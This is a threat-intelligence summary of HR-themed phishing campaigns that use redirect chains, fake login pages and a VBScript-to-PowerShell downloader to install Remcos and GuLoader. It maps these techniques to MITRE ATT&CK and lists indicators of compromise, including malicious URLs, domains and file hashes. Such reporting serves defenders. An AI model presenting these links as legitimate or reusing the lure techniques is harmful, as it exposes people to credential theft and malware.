HR-themed spam campaigns are on the rise, exploiting the Great Resignation and holiday period to lure employees with targeted social engineering. Fraudsters impersonate HR reps to push links to phishing sites or attachments that download malware, aiming to harvest credentials and compromise systems. Hashtags: #ChameleonPhishing #Remcos #GuLoader #Formstack #ZohoCampaigns
Keypoints
- Threat actors exploit HR topics and holiday-related activity to maximize attention and user likelihood of engagement.
- Campaigns impersonate HR messages and push links or attachments that lead to phishing sites or malware downloads.
- Multiple attack themes are shown, including Annual Leave Compliance, Termination List, Employee Satisfaction Report, Employee Handbook, and Confidentiality Agreement lures.
- Phishing chains often use multi-stage redirects, fake login pages, and obfuscated attachments to hide malicious content and capture credentials.
- Techniques include chameleon-style phishing sites, CAPTCHA challenges, and legitimate-service redirection (Zoho Campaigns, Formstack) to evade automated detection.
- Malware delivery involves a VBScript (VBE) downloader that executes PowerShell to install Remcos and GuLoader on victimsβ machines.
MITRE Techniques
- [T1566.002] Phishing: Spearphishing Link β The email contains a link for a supposed leave compliance report.
- [T1566.001] Phishing: Spearphishing Attachment β An email with an attachment claiming to contain employee documents.
- [T1566.003] Phishing: Spearphishing via Service β The embedded link is a URL redirector hosted by Zoho Campaigns to funnel victims to a phishing site.
- [T1027] Obfuscated/Compressed Files and Information β The attachment uses base64 encryption and other obfuscation techniques to hide its payload.
- [T1059.005] Command and Scripting Interpreter: Visual Basic β The VBE downloader uses VBScript executed via Windows Script Host.
- [T1059.001] Command and Scripting Interpreter: PowerShell β A deobfuscated PowerShell command downloads Remcos and GuLoader.
- [T1105] Ingress Tool Transfer β PowerShell downloads and stages Remcos/GuLoader from remote sources as part of the infection chain.
Indicators of Compromise
- [URL] HR-themed phishing campaign links β pub-d6a35764152345299e690fcaba91066e.r2.dev/rugaind.html#, xpncsep-zgpm.maillist-manage.com/click/1107d8d15757f4535/1107d8d15757e8355, and 2 more items
- [Domain] Domains used in phishing chain β r2.dev, maillist-manage.com, caduceusmedical.formstack.com, ujuandjule.ru (and 2 more domains)
- [File Hash] Malicious file hashes observed β f0b45089d8e6d329a1aecbc9c436faa2, c8c95a6a387113ef7117097bdc75b6e8, and 1 more hash
- [File Name] Obfuscated attachments and forms β Confidentiality Agreement form, employees.xls (and 1 more item)